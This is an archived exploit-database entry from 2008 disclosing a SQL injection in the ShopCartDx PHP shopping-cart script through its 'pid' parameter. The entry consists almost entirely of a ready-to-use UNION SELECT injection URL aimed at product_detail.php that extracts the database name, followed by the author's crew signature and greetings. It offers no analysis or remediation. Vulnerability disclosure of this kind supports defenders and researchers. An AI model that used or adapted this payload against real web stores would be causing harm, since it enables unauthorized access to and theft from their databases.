ShopCartDx 4.30 - 'pid' SQL Injection

EDB-ID:

6114




Platform:

PHP

Date:

2008-07-21


ShopcartDX Remote Sql Injection All Version

By Cr@zy_King / sqL Lov3r'Z Crew Co. 2008

Downlod: http://webscripts.softpedia.com/script/E-Commerce/Shopping-Carts/ShopcartDX-1-1421.html

Sql :

http://localhost/patch/product_detail.php?cid=9&pid=-1 UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16/*

Greatz : aLL My Friend'Z and str0ke


========================================From Turkey============================================= 

# milw0rm.com [2008-07-21]